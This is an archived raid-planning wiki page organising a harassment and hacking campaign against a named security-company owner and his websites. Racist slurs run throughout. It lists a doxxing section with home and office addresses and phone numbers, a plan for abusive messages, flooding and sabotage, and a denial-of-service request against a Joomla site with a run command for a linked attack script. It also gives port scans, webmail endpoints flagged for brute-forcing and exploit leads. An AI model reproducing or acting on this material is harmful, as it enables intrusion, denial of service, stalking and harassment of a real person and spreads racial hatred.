Operation Niggermatrix - malkovich/bibanon GitHub Wiki


Details

no1hacker; he is [http://encyclopediadramatica.com/Noone no1], he hacks [http://encyclopediadramatica.com/Noone no1]

Greg is the owner of his own "company" LIGATT Security. He has been arrested for conspiracy and wire-fraud charges, a far cry from what Kevin Mitnick, a real hacker has been arrested for. He has been appearing on TV talking his bullshit, especially The History Channel, which will make anyone puke just by watching it. His entire company is a scam, so is his title as No. 1 Hacker, what's worse is that a black guy is an investor in LIGATT security, and we all know that niggers can't hack.

wait wat? The LIGATT Security Challenge (plain txt mirror):


The LIGATT Challenge is designed for individuals to prove their computer security expertise by challenging the self proclaimed “World’s No. 1 Hacker” Gregory Evans.
By entering this contest, entrants automatically agree to be bound by the terms of this contest.
Only one entry per person, per e-mail address will be considered for contest entry.
All contestants must be at least 18 years of age, unless otherwise stated or posted.
By entering a contest, you are conclusively deemed to have agreed to be bound by these contest rules and terms and conditions as well as by any rules specific to such contest. This is an irrevocable condition of entry.
... moar
tl;dr the nigger has a 100% rigged competition that basically says you loose automatically if you challenge him, the kicker: it costs you $195.00+. The full text is here (plain txt mirror), exploitable form: here (plain txt mirror). i can has scam much? Mirrors are for posterity, in case that nigs lawyers try any funny business if/when this shit gets srs.

Also:

  1. Press Releases (ligattsecurity.net) to dig through for lulz/fail, mirrored on many 'big name' sites.
  2. Information (ligattsecurity.net) about this niggers company, targeted at Jews.
  3. List of news story mirror sites (google.com)
  4. Discussions about LIGATT SECURITY INTL INC (google.com)
  5. Stock Information (google.com) about the niggers 'company'.
Using the current numbers (as of Oct. 24th 2009), LIGATT SECURITY INTL INC is worth $60 USD on the market. xD what a poor nigger, serves him right. $60 USD isn't much but we need his company to be worth nothing.>:D It should be noted that the niggers site claims a "Estimated Market Cap: $2,462,436 as of July 27, 2009", where in reality the market cap calculated to only $62,480, this is assuming my understanding of market cap, the stock information from Pink OTC Markets Inc. (c/o Google Finance) is correct, and that my computer's mathematic outputs are correct. This is still a large amount of money but it is not what their site is claiming, I find it interesting that they chose the date of July 27th. Why fabricate the numbers when only about a month earlier (June 29, 2009) their company had it's largest peak in share volume, 148 million shares! Which (at that time where worth $0.003 each) calculates to $444,000 USD, which is a much larger value then (~7.1x) the $62,480 market cap on June 27th. This peak in share volume may not have been the peak market cap of the company but it seems that way imo, since when the shares were at their highest cost ($0.006 each) on April 22, 2009 (when I assume the company started selling stock, that data starts there), the total market cap value was only $78,900 USD (about 5.6x less then the value at the time of the share volume peak).

Idk where the nigger got the number $2,462,436, esp. on the date provided. He's had a current max. of 148 million shares but at no time in recent history has any share cost above 6/10th of a cent ($0.006) each. This nigger is pulling numbers out of his ass.

tl;dr He has currently has 100k Shares @ $0.0006 (6/1000th cent) each. The nigs site claims his company was "Founded: 2003" though Google only has stock data starting mid-April 2009 (where his shares stated @ $0.006 (6/10th cent) each, over time the price per share has dropped to much less (you can look at the graphs yourself). It should be noted (imo) that the volume (number of shares in the market) of his stock peaked to ~148M shared near the end of June '09 @ $0.003 each. The volume has moved up and down over time, there was a smaller peak of 117.54M shares (@ $0.001 each) around early Oct. '09. Tomorrow he could have over 9000 or over 9M shares on the market, if a very flexiable number. I would preferif this nigger had a volume of zero shares, but since that's close to impossible to do (look at the way the markets work), I think it would be a obtainable goal to lower this nigger's share volume to 1k or less. Of course we should also be aware of the price of the stock, because 1k shares @ over $9000 is no good either. The best way to do this is to trash his company and reputation in every and all ways possible. =)

  • Other Interesting Information:
  1. "LIGATT Security Brands: SPOOFEM.COM, SpoofAbuse, LIGATT, Made Short & Simple, No 1 Hacker and Hacker For Hire" -- sause
    No 1 Hacker = No One Hacker. lol that almost as good as an hero. xD
    Made Short & Simple = this niggers penis and mind.
    Hacker For Hire = Hacking up all the womens meat.
    lulz can be had, esp. if their 'brands' become meme for this raid. heh
  2. Terms and Conditions (ligattsecurity.net), plain txt mirror
  3. Privacy Policy (ligattsecurity.net), plain txt mirror
  4. Refund Policy (ligattsecurity.net), plain txt mirror
^^^ Any legalfags wanna take a look at those, see if they are breaking any tax laws, privacy laws, or whatever?
Arrogant nigger is arrogant: "As a child I failed to receive the necessary mentoring and guidance that every adolescent should encompass; therefore the right outlet for my genius was unrecognizable." (sauce)

Raid Planning

  • Report all GPL, GNU software violations.
  • Mailraep
  • Get the word out
  • Bandwidth Raeping
  • 1 star all his YouTube ratings
  • Reduce share worth and share volume of LIGATT SECURITY INTL INC (LGTT) to the lowest amount possible.
  • Make multiple YouTube accounts and send offensive, horrible messages
  • Raep poll on his website homepage by voting No (Put this in iMacro and repeat 9000 times)
  • Leave nasty comments on his videos, since the nigger shut off his channel comments
  • E-mail raep
  • uber-h4x0ring :3
  • Leave racist, homophobic comments on his blog
  • Leave shit at his house (we have several known anons in the Moreno Valley area)
  • if site access is gained, put his own sites on Ligatt's scam watch
  • give his sites bad ratings with WebOfTrust

Violations of the GPL, GNU Licenses

  • Needed:
List of violations, sause of programs, sause of point-of-sale, ads, etc.
Letters (personal or form) to copyright holders, developers, software creators, etc. Make sure your srsly pissed about this nigger in your letters a simple 'oh hai thar I saw your software was being sold illegally' might not be good enough, better would be 'FFFFFFFFFFFFuuuuuuuuuuckkk I'm raging man! this nigger stole you shit and it's not cool sez sonic! You should sue that nigger, here's the proof [insert].' I'm paraphrasing of course but you get the idea (I hope).
  • How to report this nigger:
Who has the power to enforce the GPL?
What should I do if I discover a possible violation of the GPL?
Violations of the GNU Licenses

PASTA:
Who has the power to enforce the GPL?
Since the GPL is a copyright license, the copyright holders of the software are the ones who have the power to enforce the GPL. If you see a violation of the GPL, you should inform the developers of the GPL-covered software involved. They either are the copyright holders, or are connected with the copyright holders.

What should I do if I discover a possible violation of the GPL?
You should report it. First, check the facts as best you can. Then tell the publisher or copyright holder of the specific GPL-covered program. If that is the Free Software Foundation, write to <license-[email protected]>. Otherwise, the program's maintainer may be the copyright holder, or else could tell you how to contact the copyright holder, so report it to the maintainer.


Remember to talk pretty to the license holders, folks at GNU.org, and other importantfags. no chatspeak, rudeness, memes, or lulz. the law is srs bizness.

Dox

  • irl addresses:
6050 Peachtree Parkway.
Suite 240
Norcross, Ga 30092

11209 National Blvd.
Suite 178
Los Angeles, Ca 90064

1028 National Blvd.
Suite 426
Los Angeles, CA 90034

23758 CEDAR CREEK TERRACE
MORENO VALLEY, California 92557

13428 Maxella Ave, Suite 293,
Marina Del Rey, California 90292

  • email addresses:
post moar addresses! :D
  • phone/fax:
  1. 866-354-4288 (phone)
  2. 866 3-LIGATT (^ same?)
  3. 866-420-4503 (fax) (Do I already hear you taping together pieces of paper?)
Both numbers use BLANK, I couldn't find the carrier with my normal raeper so I guess someone else will have to do it.

Getting the word out

Image and Video /b/ackup of the niggers youtube videos, images and any other useful data.
Create remixes, youtube poopz, trolling, lulz, etc.
/i/, /b/, youtube hater/troll videos, etc. list more shit plz.

  • Podcasts/RSS Feeds (for remixes. lulz)
  1. ligattsecurity.net/marketing/radioarchivesmall.rss - RSS Feed.
  2. ligattsecurity.net/marketing/radioarchive.rss - RSS Feed (with thumbnails)
  3. rssURLS.txt - Simple URL list of the mp3 files.
~~ YouTube ~~
~~ Vimeo ~~

See Dox for more online accounts, usernames, etc.

eXtreme SlowLoris

Although not traditional slowloris, a joomla exploit / anomaly allows for the crashing of the mysql server that powers just about everything...

Step 1) Open Socket(s)
Step 2) Send Headers:
POST /index.php?option&#61;com_user&amp;view&#61;reset&amp;layout&#61;confirm HTTP/1.1&lt;br /&gt; Host&#58; www.untraceableemail.net&lt;br /&gt; User&#45;Agent&#58; Mozilla/5.0 (Windows&#59; U&#59; Windows NT 6.1&#59; en&#45;US&#59; rv&#58;1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)&lt;br /&gt; Accept&#58; text/html,application/xhtml+xml,application/xml&#59;q&#61;0.9,&#42;/&#42;&#59;q&#61;0.8&lt;br /&gt; Accept&#45;Language&#58; en&#45;us,en&#59;q&#61;0.5&lt;br /&gt; Accept&#45;Encoding&#58; gzip,deflate&lt;br /&gt; Accept&#45;Charset&#58; ISO&#45;8859&#45;1,utf&#45;8&#59;q&#61;0.7,&#42;&#59;q&#61;0.7&lt;br /&gt; Connection&#58; keep&#45;alive&lt;br /&gt; Content&#45;Type&#58; application/x&#45;www&#45;form&#45;urlencoded&lt;br /&gt; Content&#45;Length&#58; 7&lt;br /&gt;&lt;br /&gt; token&#61;&#39;&lt;br /&gt; Step 3) Leave socket Open
Step 4) Repeat steps 1-3 a few thousand times.
Step 5) ...
Step 6) Profit!!! (http://img132.imageshack.us/img132/2548/screenshot1l.jpg)

php script by e http://p.defau.lt/?0j5qP32aKlvw3KSEZUdaaA
Run using php filename.php 1000 10 100 100 www.untraceableemail.net

Bandwidth Raeping

Large-ish files hosted on:

  • ligattsecurity.net:
  1. 1644k jpg file
  2. 722kb png file
  • spoofem.com (where super cool nigger hackers luv bitmap files, and useless memoirs):
  1. 13mb pdf file
  2. another 13mb pdf file
  3. 613k bmp file
  4. 573k bmp file
Post bigger files when if you find them and remember to remove the "http://anonym.to/?" prefix before you start reaping the URLs provided.
  • Google Image Searches:
  1. list1.txt - ligattsecurity.net; Complete List of Image File URLs extracted from Google Image Search (with amendments)
  2. spoofem.com (113 files)
  • Files Lists:
  1. list2.txt - spoofem.com; InComplete List of Image File URLs extracted from Google Image Search.
  • Podcasts/RSS Feeds (big files, also good for remixes)
  1. rssURLS.txt - Simple URL list of the mp3 files (downloading all the files in the list will use 122 MB [128,794,659] of bandwidth), sause: ligattsecurity.net/marketing/radioarchivesmall.rs.

uber-h4x0ring :3

  • IP Addresses / Targets:
This nigger has too many websites. I wonder if they are all from the same GoDaddy account.
  • Webmail & Email!!!! =D
Webmail Login
Known Accounts:
Manual Email (for bruteforcers and testing):
Incoming mail server (POP3)
POP, Pop.secureserver.net or IMAP, imap.secureserver.net.
Outgoing mail server (SMTP)
Smtpout.secureserver.net
GoDaddy seems to run all their inhouse email through secureserver.net.
It should be noted the URLs: webmail.ligatt.com, webmail.spoofabuse.com, webmail.untracableemail.com, webmail.spoofem.net, and webmail.ligattsecurity.net all point to https://email.secureserver.net with their respective domain names pre-entered into the page.
  • Port Scans
Scanned ports 1 through 1500 using OPScanner 2.0
  • ligatt.com ; open ports:
  1. 80 [http]
  • ligattsecurity.net ; open ports:
  1. 21 [ftp]
  2. 80 [http]
  3. 443 [https]
  • cybercrimedefensecard.com ; open ports;
  1. 21 [ftp]
  2. 22 [ssh]
  3. 53 [dns]
  4. 80 [http]
  5. 110 [pop3]
  6. 443 [https]
  7. 993 [imap4]
  8. 995 [pop3s]
  • spoofem.com ; //main site [scanned]ports 1 through 65535 using nmap
Discovered open ports:
  1. 21/tcp [ftp] on 97.74.195.55
  2. 22/tcp [ssh] on 97.74.195.55
  3. 25/tcp [smtp] on 97.74.195.55
  4. 53/tcp [dns] on 97.74.195.55
  5. 80/tcp [http] on 97.74.195.55
  6. 443/tcp [https] on 97.74.195.55
  • spoofem.net ; //contains some login scripts for .com [scanned]ports 1 through 65535 using nmap
Discovered open ports:
  1. 21/tcp [ftp] on 72.167.183.50
  2. 80/tcp [http] on 72.167.183.50
  3. 28836/tcp on 72.167.183.50
  4. 32003/tcp on 72.167.183.50
  5. 41436/tcp on 72.167.183.50
//what the fuck are these unregistered ports. possible attack vector? need udp scans too.
//web app fuzzing also a good idea, especially if these shitcunts wrote their own scripts.
-- The unregistered ports may be used by the SMS/Call spoofing services he claims to run, but that's just a wild guess on my part. Interesting ports are interesting.
  • Whois Records:
  1. ligatt.com :: SamSpade, Lookup Server, GoDaddy (registrar)
  2. ligattsecurity.net :: SamSpade, Lookup Server, GoDaddy (registrar)
  3. spoofem.com :: SamSpade, Lookup Server, GoDaddy (registrar)
  4. spoofem.net :: SamSpade, Lookup Server, GoDaddy (registrar)
  5. spoofabuse.com :: SamSpade, Lookup Server
  6. untracableemail.com :: SamSpade, Lookup Server
Interesting Shit:
Here's a report from acunetix: http://anonym.to/?http://rapidshare.com/files/300618174/ligattscan.pdf
Warning: require_once(/home/spoofemcom/public_html/administrator/components/com_rsfirewall/helpers/rsfirewall.php) [function.require-once]: failed to open stream: No such file or directory in /home/spoofemcom/public_html/plugins/system/rsfirewall.php on line 12
Fatal error: require_once() [function.require]: Failed opening required '/home/spoofemcom/public_html/administrator/components/com_rsfirewall/helpers/rsfirewall.php' (include_path='.:/usr/share/pear:/usr/share/php') in /home/spoofemcom/public_html/plugins/system/rsfirewall.php on line 12

Exploitable? Did someone break this site already? lol I hope so.
Site frontpage (index.php) seems to have returned to normal (no errors) @ ~3:20am (EDT); 10/23/2009.

Warning: require_once(/home/content/s/p/o/spoofem/html/includes/defines.php) [function.require-once]: failed to open stream: No such file or directory in /home/content/s/p/o/spoofem/html/index.php on line 25
Fatal error: require_once() [function.require]: Failed opening required '/home/content/s/p/o/spoofem/html/includes/defines.php' (include_path='.:/usr/local/php5/lib/php') in /home/content/s/p/o/spoofem/html/index.php on line 25

<iframe src="http://www.stocktrader.org.uk/remote/index.php?wt=10000000000000000&amp;h=250&amp;w=200&amp;bgc=f8fbf8&amp;tf=arial&amp;tfs=&amp;tc=688b9f&amp;tbc=688b9f&amp;f=arial&amp;fc=000000&amp;fs=10&amp;tz=-5&amp;cw=spof.pk" marginheight="0" marginwidth="0" scrolling="no" width="200" frameborder="0" height="220"></iframe>
Observed a strange flicker in the webpage index.php (rendered in Opera v10), investigated because it was kind of annoying, discovered IFRAME. Exploited if we can take over the iframe or dns to stocktrader.org.uk (unlikely) but if we find a sploit on the stock trader site it could be useful. Spoofem.com's PHP is def. not written by a hacker (or by machine), it's written by a nigger. Just look at the source code, you can tell. Even noticed some oily KFC fingerprints from the faggot in that PHP, like: , , and more faggotry close tags without any open tags that have been marked out instead of deleted. @_@

  • Bot Friendly Pages:
  1. ligattsecurity.net/index.php?option=com_registration&task=register - Registration Page (for flooding)
  2. ligattsecurity.net/index.php?option=com_login&Itemid=88888888 - Login Page (for testing, flooding, trolling, etc.)
    (leave other forms blank, enter captcha, click submit, ????, PROFIT!)
  3. ligattsecurity.net/index.php?option=com_content&task=view&id=316&Itemid=81 - Username/Password Post action to the PHP, looks like fun. Also a more blank forms on the page with no captchas.
  4. ligattsecurity.net/index.php?option=com_forme&Itemid=81&fid=11 - Contact Us page with form, no captcha, good for flooding trolling, etc.

  • w3 Markup Validation Service Outputs (real h4x0rs write webpages in pure binary, don't need HTML standards @_@... I'm kidding this nigger is a such a faggot, he even uses Joomla, I fucking hate Joomla. More on that later, scroll down).
  1. Checked: spoofem.com/index.php | Result: 68 Errors, 45 warning(s)
  2. Checked: ligattsecurity.net/index.php | Result: 118 Errors, 50 warning(s)

  • possible mail/proxy exploit on ligattsecurity
  1. http://anonym.to/?http://pastebay.com/63313

  • Joomla (is a piece of shit, very exploitable.)
  1. From cybercrimedefensecard.com/index.php, line 10;
    <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
  2. From spoofem.com/index.php (lines 6,7,8);
    <meta name="keywords" content="joomla, Joomla" />
    <meta name="description" content="Joomla! - the dynamic portal engine and content management system" />
    <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
  3. From ligattsecurity.net/index.php (various lines);

  4. From spoofem.net/joomla/index.php (various lines);
    <meta name="Generator" content="JoomSEO by Phill Brown (http://www.joomseo.com)." />
    <meta name="Generator" content="Joomla! - Copyright (C) 2005 - 2007 Open Source Matters. All rights reserved." />

  • It appears that on spoofem.com the index.php page may be xss vunerable (sause plz =D?)
  1. sause = acunetix vulnerability scanner
  • Double PHP! yay! :P Twice the fun, twice the 'sploits.
ligattsecurity.net ;;
  1. index.php
  2. index2.php
spoofem.com ;;
  1. index.php
  2. index2.php
spoofem.net ;;
  1. index.php
  2. index2.php

Joomla (1.5) logins
  1. Spoofem
  2. Cybercrimedefensecard

Moar Dox

Finances and BS article releases:

Names/addresses/emails:

from contact page on ligatt.com:
Amanda Duggan/Ebony Simpson
LIGATT Security International
11209 National Blvd.
Suite 178
Los Angeles, Ca 90064
[email protected]
866-354-4288 (phone)
866-420-4503 (fax)

from whois for bullymenomore.org:

GREGORY EVANS
LIGATT Investment Group
1028 National Blvd.
Suite 426
Los Angeles, CA 90034

from whois for ligatt.com:
EVANS, GREGORY [email protected]
LIGATT CORP
23758 CEDAR CREEK TERRACE
MORENO VALLEY, California 92557
United States
9095369216
(Above is from 2003 and may be GOLDEN)

from whois for ligattsecurity.com:

Registrant:
LIGATT Investment Group, 13428 Maxella Ave, Suite 293, Marina Del Rey, California 90292, United States Registered through: GoDaddy.com, Inc.
Administrative Contact: EVANS, GREGORY [email protected], LIGATT Investment Group,13428 Maxella Ave, Suite 293, Marina Del Rey, California 90292, United States, (866) 354-4288

other misc email addresses:


Various recon points:
~~ Twitter ~~

~~ Facebook ~~
Both Facebooks need wallreaps, among other lulz.
~~ MySpace ~~
~~ YouTube ~~
~~ Vimeo ~~
~~ Misc. ~~
company websites:

To Do

  1. Think about what 'To Do'
  2. Make a plan
  3. Edit the wiki page

Victories

Shooped Nigger Poll raep, Anon DO NOT WANT Haxor Category:Good New Raids